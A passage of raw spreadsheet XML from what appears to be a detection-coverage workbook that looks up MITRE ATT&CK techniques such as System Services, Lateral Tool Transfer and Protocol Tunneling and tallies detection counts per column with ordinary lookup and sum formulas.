        <f t="shared" si="8"/>
        <v>2 (6)</v>
      </c>
      <c r="BF61" s="12">
        <v>2</v>
      </c>
      <c r="BG61" s="13">
        <v>1</v>
      </c>
      <c r="BH61" s="394">
        <v>2</v>
      </c>
      <c r="BI61" s="292">
        <v>0</v>
      </c>
      <c r="BJ61" s="322">
        <v>0</v>
      </c>
      <c r="BK61" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL61" s="12">
        <v>0</v>
      </c>
      <c r="BM61" s="13">
        <v>0</v>
      </c>
      <c r="BN61" s="394">
        <v>0</v>
      </c>
      <c r="BO61" s="292">
        <v>389</v>
      </c>
      <c r="BP61" s="322">
        <v>389</v>
      </c>
      <c r="BQ61" s="322" t="str">
        <f t="shared" si="10"/>
        <v>389 (389)</v>
      </c>
      <c r="BR61" s="12">
        <v>0</v>
      </c>
      <c r="BS61" s="12">
        <v>6</v>
      </c>
      <c r="BT61" s="13">
        <v>1</v>
      </c>
      <c r="BU61" s="394">
        <v>266</v>
      </c>
      <c r="BV61" s="292">
        <v>0</v>
      </c>
      <c r="BW61" s="322">
        <v>0</v>
      </c>
      <c r="BX61" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY61" s="12">
        <v>0</v>
      </c>
      <c r="BZ61" s="13">
        <v>0</v>
      </c>
      <c r="CA61" s="394">
        <v>0</v>
      </c>
      <c r="CB61" s="292">
        <v>20</v>
      </c>
      <c r="CC61" s="322">
        <v>20</v>
      </c>
      <c r="CD61" s="322" t="str">
        <f t="shared" si="12"/>
        <v>20 (20)</v>
      </c>
      <c r="CE61" s="12">
        <v>0</v>
      </c>
      <c r="CF61" s="12">
        <v>1</v>
      </c>
      <c r="CG61" s="13">
        <v>1</v>
      </c>
      <c r="CH61" s="394">
        <v>20</v>
      </c>
    </row>
    <row r="62" spans="1:86" ht="15" customHeight="1">
      <c r="A62" s="4">
        <f t="shared" si="13"/>
        <v>60</v>
      </c>
      <c r="B62" s="4" t="str">
        <f>IFERROR(VLOOKUP(A62,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1569</v>
      </c>
      <c r="C62" s="493" t="str">
        <f>IFERROR(VLOOKUP(B62,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Services</v>
      </c>
      <c r="D62" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B62)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E62" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>17</v>
      </c>
      <c r="F62" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (17)</v>
      </c>
      <c r="G62" s="292">
        <v>13</v>
      </c>
      <c r="H62" s="322">
        <v>2</v>
      </c>
      <c r="I62" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (13)</v>
      </c>
      <c r="J62" s="12">
        <v>1</v>
      </c>
      <c r="K62" s="13">
        <v>1</v>
      </c>
      <c r="L62" s="394">
        <v>2</v>
      </c>
      <c r="M62" s="322">
        <v>14</v>
      </c>
      <c r="N62" s="322">
        <v>4</v>
      </c>
      <c r="O62" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (14)</v>
      </c>
      <c r="P62" s="12">
        <v>4</v>
      </c>
      <c r="Q62" s="13">
        <v>1</v>
      </c>
      <c r="R62" s="394">
        <v>2</v>
      </c>
      <c r="S62" s="292">
        <v>27</v>
      </c>
      <c r="T62" s="322">
        <v>6</v>
      </c>
      <c r="U62" s="322" t="str">
        <f t="shared" si="2"/>
        <v>6 (27)</v>
      </c>
      <c r="V62" s="12">
        <v>5</v>
      </c>
      <c r="W62" s="13">
        <v>1</v>
      </c>
      <c r="X62" s="394">
        <v>3</v>
      </c>
      <c r="Y62" s="392">
        <v>21</v>
      </c>
      <c r="Z62" s="392">
        <v>5</v>
      </c>
      <c r="AA62" s="322" t="str">
        <f t="shared" si="3"/>
        <v>5 (21)</v>
      </c>
      <c r="AB62" s="392">
        <v>4</v>
      </c>
      <c r="AC62" s="16">
        <v>1</v>
      </c>
      <c r="AD62" s="394">
        <v>2</v>
      </c>
      <c r="AE62" s="392">
        <v>21</v>
      </c>
      <c r="AF62" s="392">
        <v>11</v>
      </c>
      <c r="AG62" s="322" t="str">
        <f t="shared" si="4"/>
        <v>11 (21)</v>
      </c>
      <c r="AH62" s="392">
        <v>9</v>
      </c>
      <c r="AI62" s="16">
        <v>1</v>
      </c>
      <c r="AJ62" s="394">
        <v>5</v>
      </c>
      <c r="AK62" s="392">
        <v>42</v>
      </c>
      <c r="AL62" s="392">
        <v>16</v>
      </c>
      <c r="AM62" s="322" t="str">
        <f t="shared" si="5"/>
        <v>16 (42)</v>
      </c>
      <c r="AN62" s="392">
        <v>13</v>
      </c>
      <c r="AO62" s="16">
        <v>1</v>
      </c>
      <c r="AP62" s="394">
        <v>6</v>
      </c>
      <c r="AQ62" s="292">
        <v>0</v>
      </c>
      <c r="AR62" s="322">
        <v>0</v>
      </c>
      <c r="AS62" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT62" s="12">
        <v>0</v>
      </c>
      <c r="AU62" s="13">
        <v>0</v>
      </c>
      <c r="AV62" s="394">
        <v>0</v>
      </c>
      <c r="AW62" s="392">
        <v>0</v>
      </c>
      <c r="AX62" s="392">
        <v>0</v>
      </c>
      <c r="AY62" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ62" s="4">
        <v>0</v>
      </c>
      <c r="BA62" s="16">
        <v>0</v>
      </c>
      <c r="BB62" s="394">
        <v>0</v>
      </c>
      <c r="BC62" s="292">
        <v>27</v>
      </c>
      <c r="BD62" s="322">
        <v>6</v>
      </c>
      <c r="BE62" s="322" t="str">
        <f t="shared" si="8"/>
        <v>6 (27)</v>
      </c>
      <c r="BF62" s="12">
        <v>5</v>
      </c>
      <c r="BG62" s="13">
        <v>1</v>
      </c>
      <c r="BH62" s="394">
        <v>3</v>
      </c>
      <c r="BI62" s="292">
        <v>0</v>
      </c>
      <c r="BJ62" s="322">
        <v>0</v>
      </c>
      <c r="BK62" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL62" s="12">
        <v>0</v>
      </c>
      <c r="BM62" s="13">
        <v>0</v>
      </c>
      <c r="BN62" s="394">
        <v>0</v>
      </c>
      <c r="BO62" s="292">
        <v>13</v>
      </c>
      <c r="BP62" s="322">
        <v>13</v>
      </c>
      <c r="BQ62" s="322" t="str">
        <f t="shared" si="10"/>
        <v>13 (13)</v>
      </c>
      <c r="BR62" s="12">
        <v>0</v>
      </c>
      <c r="BS62" s="12">
        <v>8</v>
      </c>
      <c r="BT62" s="13">
        <v>1</v>
      </c>
      <c r="BU62" s="394">
        <v>10</v>
      </c>
      <c r="BV62" s="292">
        <v>0</v>
      </c>
      <c r="BW62" s="322">
        <v>0</v>
      </c>
      <c r="BX62" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY62" s="12">
        <v>0</v>
      </c>
      <c r="BZ62" s="13">
        <v>0</v>
      </c>
      <c r="CA62" s="394">
        <v>0</v>
      </c>
      <c r="CB62" s="292">
        <v>1</v>
      </c>
      <c r="CC62" s="322">
        <v>1</v>
      </c>
      <c r="CD62" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE62" s="12">
        <v>0</v>
      </c>
      <c r="CF62" s="12">
        <v>1</v>
      </c>
      <c r="CG62" s="13">
        <v>1</v>
      </c>
      <c r="CH62" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:86" ht="15" customHeight="1">
      <c r="A63" s="4">
        <f t="shared" si="13"/>
        <v>61</v>
      </c>
      <c r="B63" s="4" t="str">
        <f>IFERROR(VLOOKUP(A63,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1570</v>
      </c>
      <c r="C63" s="493" t="str">
        <f>IFERROR(VLOOKUP(B63,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Lateral Tool Transfer</v>
      </c>
      <c r="D63" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B63)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E63" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F63" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (7)</v>
      </c>
      <c r="G63" s="292">
        <v>7</v>
      </c>
      <c r="H63" s="322">
        <v>2</v>
      </c>
      <c r="I63" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (7)</v>
      </c>
      <c r="J63" s="12">
        <v>1</v>
      </c>
      <c r="K63" s="13">
        <v>1</v>
      </c>
      <c r="L63" s="394">
        <v>2</v>
      </c>
      <c r="M63" s="322">
        <v>3</v>
      </c>
      <c r="N63" s="322">
        <v>2</v>
      </c>
      <c r="O63" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (3)</v>
      </c>
      <c r="P63" s="12">
        <v>1</v>
      </c>
      <c r="Q63" s="13">
        <v>1</v>
      </c>
      <c r="R63" s="394">
        <v>2</v>
      </c>
      <c r="S63" s="292">
        <v>10</v>
      </c>
      <c r="T63" s="322">
        <v>4</v>
      </c>
      <c r="U63" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (10)</v>
      </c>
      <c r="V63" s="12">
        <v>2</v>
      </c>
      <c r="W63" s="13">
        <v>1</v>
      </c>
      <c r="X63" s="394">
        <v>2</v>
      </c>
      <c r="Y63" s="392">
        <v>7</v>
      </c>
      <c r="Z63" s="392">
        <v>2</v>
      </c>
      <c r="AA63" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (7)</v>
      </c>
      <c r="AB63" s="392">
        <v>1</v>
      </c>
      <c r="AC63" s="16">
        <v>1</v>
      </c>
      <c r="AD63" s="394">
        <v>2</v>
      </c>
      <c r="AE63" s="392">
        <v>13</v>
      </c>
      <c r="AF63" s="392">
        <v>6</v>
      </c>
      <c r="AG63" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (13)</v>
      </c>
      <c r="AH63" s="392">
        <v>3</v>
      </c>
      <c r="AI63" s="16">
        <v>1</v>
      </c>
      <c r="AJ63" s="394">
        <v>2</v>
      </c>
      <c r="AK63" s="392">
        <v>20</v>
      </c>
      <c r="AL63" s="392">
        <v>8</v>
      </c>
      <c r="AM63" s="322" t="str">
        <f t="shared" si="5"/>
        <v>8 (20)</v>
      </c>
      <c r="AN63" s="392">
        <v>4</v>
      </c>
      <c r="AO63" s="16">
        <v>1</v>
      </c>
      <c r="AP63" s="394">
        <v>2</v>
      </c>
      <c r="AQ63" s="292">
        <v>0</v>
      </c>
      <c r="AR63" s="322">
        <v>0</v>
      </c>
      <c r="AS63" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT63" s="12">
        <v>0</v>
      </c>
      <c r="AU63" s="13">
        <v>0</v>
      </c>
      <c r="AV63" s="394">
        <v>0</v>
      </c>
      <c r="AW63" s="392">
        <v>0</v>
      </c>
      <c r="AX63" s="392">
        <v>0</v>
      </c>
      <c r="AY63" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ63" s="4">
        <v>0</v>
      </c>
      <c r="BA63" s="16">
        <v>0</v>
      </c>
      <c r="BB63" s="394">
        <v>0</v>
      </c>
      <c r="BC63" s="292">
        <v>10</v>
      </c>
      <c r="BD63" s="322">
        <v>4</v>
      </c>
      <c r="BE63" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (10)</v>
      </c>
      <c r="BF63" s="12">
        <v>2</v>
      </c>
      <c r="BG63" s="13">
        <v>1</v>
      </c>
      <c r="BH63" s="394">
        <v>2</v>
      </c>
      <c r="BI63" s="292">
        <v>2</v>
      </c>
      <c r="BJ63" s="322">
        <v>1</v>
      </c>
      <c r="BK63" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL63" s="12">
        <v>1</v>
      </c>
      <c r="BM63" s="13">
        <v>1</v>
      </c>
      <c r="BN63" s="394">
        <v>1</v>
      </c>
      <c r="BO63" s="292">
        <v>2</v>
      </c>
      <c r="BP63" s="322">
        <v>1</v>
      </c>
      <c r="BQ63" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (2)</v>
      </c>
      <c r="BR63" s="12">
        <v>1</v>
      </c>
      <c r="BS63" s="12">
        <v>0</v>
      </c>
      <c r="BT63" s="13">
        <v>1</v>
      </c>
      <c r="BU63" s="394">
        <v>1</v>
      </c>
      <c r="BV63" s="292">
        <v>0</v>
      </c>
      <c r="BW63" s="322">
        <v>0</v>
      </c>
      <c r="BX63" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY63" s="12">
        <v>0</v>
      </c>
      <c r="BZ63" s="13">
        <v>0</v>
      </c>
      <c r="CA63" s="394">
        <v>0</v>
      </c>
      <c r="CB63" s="292">
        <v>0</v>
      </c>
      <c r="CC63" s="322">
        <v>0</v>
      </c>
      <c r="CD63" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE63" s="12">
        <v>0</v>
      </c>
      <c r="CF63" s="12">
        <v>0</v>
      </c>
      <c r="CG63" s="13">
        <v>0</v>
      </c>
      <c r="CH63" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:86" ht="15" customHeight="1">
      <c r="A64" s="4">
        <f t="shared" si="13"/>
        <v>62</v>
      </c>
      <c r="B64" s="4" t="str">
        <f>IFERROR(VLOOKUP(A64,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1571</v>
      </c>
      <c r="C64" s="4" t="str">
        <f>IFERROR(VLOOKUP(B64,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Standard Port</v>
      </c>
      <c r="D64" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B64)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F64" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G64" s="292">
        <v>2</v>
      </c>
      <c r="H64" s="322">
        <v>1</v>
      </c>
      <c r="I64" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J64" s="12">
        <v>1</v>
      </c>
      <c r="K64" s="13">
        <v>1</v>
      </c>
      <c r="L64" s="394">
        <v>1</v>
      </c>
      <c r="M64" s="322">
        <v>0</v>
      </c>
      <c r="N64" s="322">
        <v>0</v>
      </c>
      <c r="O64" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P64" s="12">
        <v>0</v>
      </c>
      <c r="Q64" s="13">
        <v>0</v>
      </c>
      <c r="R64" s="394">
        <v>0</v>
      </c>
      <c r="S64" s="292">
        <v>2</v>
      </c>
      <c r="T64" s="322">
        <v>1</v>
      </c>
      <c r="U64" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V64" s="12">
        <v>1</v>
      </c>
      <c r="W64" s="13">
        <v>1</v>
      </c>
      <c r="X64" s="394">
        <v>1</v>
      </c>
      <c r="Y64" s="392">
        <v>2</v>
      </c>
      <c r="Z64" s="392">
        <v>1</v>
      </c>
      <c r="AA64" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (2)</v>
      </c>
      <c r="AB64" s="392">
        <v>1</v>
      </c>
      <c r="AC64" s="16">
        <v>1</v>
      </c>
      <c r="AD64" s="394">
        <v>1</v>
      </c>
      <c r="AE64" s="392">
        <v>4</v>
      </c>
      <c r="AF64" s="392">
        <v>2</v>
      </c>
      <c r="AG64" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH64" s="392">
        <v>2</v>
      </c>
      <c r="AI64" s="16">
        <v>1</v>
      </c>
      <c r="AJ64" s="394">
        <v>1</v>
      </c>
      <c r="AK64" s="392">
        <v>6</v>
      </c>
      <c r="AL64" s="392">
        <v>3</v>
      </c>
      <c r="AM64" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3 (6)</v>
      </c>
      <c r="AN64" s="392">
        <v>3</v>
      </c>
      <c r="AO64" s="16">
        <v>1</v>
      </c>
      <c r="AP64" s="394">
        <v>1</v>
      </c>
      <c r="AQ64" s="292">
        <v>0</v>
      </c>
      <c r="AR64" s="322">
        <v>0</v>
      </c>
      <c r="AS64" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT64" s="12">
        <v>0</v>
      </c>
      <c r="AU64" s="13">
        <v>0</v>
      </c>
      <c r="AV64" s="394">
        <v>0</v>
      </c>
      <c r="AW64" s="392">
        <v>0</v>
      </c>
      <c r="AX64" s="392">
        <v>0</v>
      </c>
      <c r="AY64" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ64" s="4">
        <v>0</v>
      </c>
      <c r="BA64" s="16">
        <v>0</v>
      </c>
      <c r="BB64" s="394">
        <v>0</v>
      </c>
      <c r="BC64" s="292">
        <v>2</v>
      </c>
      <c r="BD64" s="322">
        <v>1</v>
      </c>
      <c r="BE64" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (2)</v>
      </c>
      <c r="BF64" s="12">
        <v>1</v>
      </c>
      <c r="BG64" s="13">
        <v>1</v>
      </c>
      <c r="BH64" s="394">
        <v>1</v>
      </c>
      <c r="BI64" s="292">
        <v>0</v>
      </c>
      <c r="BJ64" s="322">
        <v>0</v>
      </c>
      <c r="BK64" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL64" s="12">
        <v>0</v>
      </c>
      <c r="BM64" s="13">
        <v>0</v>
      </c>
      <c r="BN64" s="394">
        <v>0</v>
      </c>
      <c r="BO64" s="292">
        <v>1</v>
      </c>
      <c r="BP64" s="322">
        <v>1</v>
      </c>
      <c r="BQ64" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR64" s="12">
        <v>0</v>
      </c>
      <c r="BS64" s="12">
        <v>1</v>
      </c>
      <c r="BT64" s="13">
        <v>1</v>
      </c>
      <c r="BU64" s="394">
        <v>1</v>
      </c>
      <c r="BV64" s="292">
        <v>0</v>
      </c>
      <c r="BW64" s="322">
        <v>0</v>
      </c>
      <c r="BX64" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY64" s="12">
        <v>0</v>
      </c>
      <c r="BZ64" s="13">
        <v>0</v>
      </c>
      <c r="CA64" s="394">
        <v>0</v>
      </c>
      <c r="CB64" s="292">
        <v>1</v>
      </c>
      <c r="CC64" s="322">
        <v>1</v>
      </c>
      <c r="CD64" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE64" s="12">
        <v>0</v>
      </c>
      <c r="CF64" s="12">
        <v>1</v>
      </c>
      <c r="CG64" s="13">
        <v>1</v>
      </c>
      <c r="CH64" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:98" ht="15" customHeight="1">
      <c r="A65" s="4">
        <f t="shared" si="13"/>
        <v>63</v>
      </c>
      <c r="B65" s="4" t="str">
        <f>IFERROR(VLOOKUP(A65,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1572</v>
      </c>
      <c r="C65" s="4" t="str">
        <f>IFERROR(VLOOKUP(B65,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Protocol Tunneling</v>
      </c>
      <c r="D65" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B65)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F65" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G65" s="292">
        <v>6</v>
      </c>
      <c r="H65" s="322">
        <v>2</v>
      </c>
      <c r="I65" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (6)</v>
      </c>
      <c r="J65" s="12">
        <v>1</v>
      </c>
      <c r="K65" s="13">
        <v>1</v>
      </c>
      <c r="L65" s="394">
        <v>2</v>
      </c>
      <c r="M65" s="322">
        <v>1</v>
      </c>
      <c r="N65" s="322">
        <v>1</v>
      </c>
      <c r="O65" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P65" s="12">
        <v>1</v>
      </c>
      <c r="Q65" s="13">
        <v>1</v>
      </c>
      <c r="R65" s="394">
        <v>1</v>
      </c>
      <c r="S65" s="292">
        <v>7</v>
      </c>
      <c r="T65" s="322">
        <v>3</v>
      </c>
      <c r="U65" s="322" t="str">
        <f t="shared" si="2"/>
        <v>3 (7)</v>
      </c>
      <c r="V65" s="12">
        <v>2</v>
      </c>
      <c r="W65" s="13">
        <v>1</v>
      </c>
      <c r="X65" s="394">
        <v>2</v>
      </c>
      <c r="Y65" s="392">
        <v>7</v>
      </c>
      <c r="Z65" s="392">
        <v>3</v>
      </c>
      <c r="AA65" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (7)</v>
      </c>
      <c r="AB65" s="392">
        <v>2</v>
      </c>
      <c r="AC65" s="16">
        <v>1</v>
      </c>
      <c r="AD65" s="394">
        <v>2</v>
      </c>
      <c r="AE65" s="392">
        <v>6</v>
      </c>
      <c r="AF65" s="392">
        <v>4</v>
      </c>
      <c r="AG65" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (6)</v>
      </c>
      <c r="AH65" s="392">
        <v>4</v>
      </c>
      <c r="AI65" s="16">
        <v>1</v>
      </c>
      <c r="AJ65" s="394">
        <v>3</v>
      </c>
      <c r="AK65" s="392">
        <v>13</v>
      </c>
      <c r="AL65" s="392">
        <v>7</v>
      </c>
      <c r="AM65" s="322" t="str">
        <f t="shared" si="5"/>
        <v>7 (13)</v>
      </c>
      <c r="AN65" s="392">
        <v>6</v>
      </c>
      <c r="AO65" s="16">
        <v>1</v>
      </c>
      <c r="AP65" s="394">
        <v>3</v>
      </c>
      <c r="AQ65" s="292">
        <v>0</v>
      </c>
      <c r="AR65" s="322">
        <v>0</v>
      </c>
      <c r="AS65" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT65" s="12">
        <v>0</v>
      </c>
      <c r="AU65" s="13">
        <v>0</v>
      </c>
      <c r="AV65" s="394">
        <v>0</v>
      </c>
      <c r="AW65" s="392">
        <v>1</v>
      </c>
      <c r="AX65" s="392">
        <v>1</v>
      </c>
      <c r="AY65" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ65" s="4">
        <v>1</v>
      </c>
      <c r="BA65" s="16">
        <v>1</v>
      </c>
      <c r="BB65" s="394">
        <v>1</v>
      </c>
      <c r="BC65" s="292">
        <v>8</v>
      </c>
      <c r="BD65" s="322">
        <v>4</v>
      </c>
      <c r="BE65" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (8)</v>
      </c>
      <c r="BF65" s="12">
        <v>3</v>
      </c>
      <c r="BG65" s="13">
        <v>1</v>
      </c>
      <c r="BH65" s="394">
        <v>2</v>
      </c>
      <c r="BI65" s="292">
        <v>4</v>
      </c>
      <c r="BJ65" s="322">
        <v>3</v>
      </c>
      <c r="BK65" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL65" s="12">
        <v>3</v>
      </c>
      <c r="BM65" s="13">
        <v>1</v>
      </c>
      <c r="BN65" s="394">
        <v>2</v>
      </c>
      <c r="BO65" s="292">
        <v>5</v>
      </c>
      <c r="BP65" s="322">
        <v>4</v>
      </c>
      <c r="BQ65" s="322" t="str">
        <f t="shared" si="10"/>
        <v>4 (5)</v>
      </c>
      <c r="BR65" s="12">
        <v>3</v>
      </c>
      <c r="BS65" s="12">
        <v>1</v>
      </c>
      <c r="BT65" s="13">
        <v>1</v>
      </c>
      <c r="BU65" s="394">
        <v>2</v>
      </c>
      <c r="BV65" s="292">
        <v>0</v>
      </c>
      <c r="BW65" s="322">
        <v>0</v>
      </c>
      <c r="BX65" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY65" s="12">
        <v>0</v>
      </c>
      <c r="BZ65" s="13">
        <v>0</v>
      </c>
      <c r="CA65" s="394">
        <v>0</v>
      </c>
      <c r="CB65" s="292">
        <v>1</v>
      </c>
      <c r="CC65" s="322">
        <v>1</v>
      </c>
      <c r="CD65" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE65" s="12">
        <v>0</v>
      </c>
      <c r="CF65" s="12">
        <v>1</v>
      </c>
      <c r="CG65" s="13">
        <v>1</v>
      </c>
      <c r="CH65" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:98" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A66" s="4">
        <f t="shared" si="13"/>
        <v>64</v>
      </c>
      <c r="B66" s="4" t="str">
        <f>IFERROR(VLOOKUP(A66,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1573</v>
      </c>
      <c r="C66" s="4" t="str">
        <f>IFERROR(VLOOKUP(B66,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Encrypted Channel</v>
      </c>
      <c r="D66" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B66)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F66" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G66" s="292">
        <v>1</v>
      </c>
      <c r="H66" s="322">
        <v>1</v>
      </c>
      <c r="I66" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J66" s="12">
        <v>1</v>
      </c>
      <c r="K66" s="13">
        <v>1</v>
      </c>
      <c r="L66" s="394">
        <v>1</v>
      </c>
      <c r="M66" s="322">
        <v>0</v>
      </c>
      <c r="N66" s="322">
        <v>0</v>
      </c>
      <c r="O66" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P66" s="12">
        <v>0</v>
      </c>
      <c r="Q66" s="13">
        <v>0</v>
      </c>
      <c r="R66" s="394">
        <v>0</v>
      </c>
      <c r="S66" s="292">
        <v>1</v>
      </c>
      <c r="T66" s="322">
        <v>1</v>
      </c>
      <c r="U66" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V66" s="12">
        <v>1</v>
      </c>
      <c r="W66" s="13">
        <v>1</v>
      </c>
      <c r="X66" s="394">
        <v>1</v>
      </c>
      <c r="Y66" s="392">
        <v>1</v>
      </c>
      <c r="Z66" s="392">
        <v>1</v>
      </c>
      <c r="AA66" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB66" s="392">
        <v>1</v>
      </c>
      <c r="AC66" s="16">
        <v>1</v>
      </c>
      <c r="AD66" s="394">
        <v>1</v>
      </c>
      <c r="AE66" s="392">
        <v>5</v>
      </c>
      <c r="AF66" s="392">
        <v>3</v>
      </c>
      <c r="AG66" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (5)</v>
      </c>
      <c r="AH66" s="392">
        <v>3</v>
      </c>
      <c r="AI66" s="16">
        <v>1</v>
      </c>
      <c r="AJ66" s="394">
        <v>2</v>
      </c>
      <c r="AK66" s="392">
        <v>6</v>
      </c>
      <c r="AL66" s="392">
        <v>4</v>
      </c>
      <c r="AM66" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (6)</v>
      </c>
      <c r="AN66" s="392">
        <v>4</v>
      </c>
      <c r="AO66" s="16">
        <v>1</v>
      </c>
      <c r="AP66" s="394">
        <v>2</v>
      </c>
      <c r="AQ66" s="292">
        <v>0</v>
      </c>
      <c r="AR66" s="322">
        <v>0</v>
      </c>
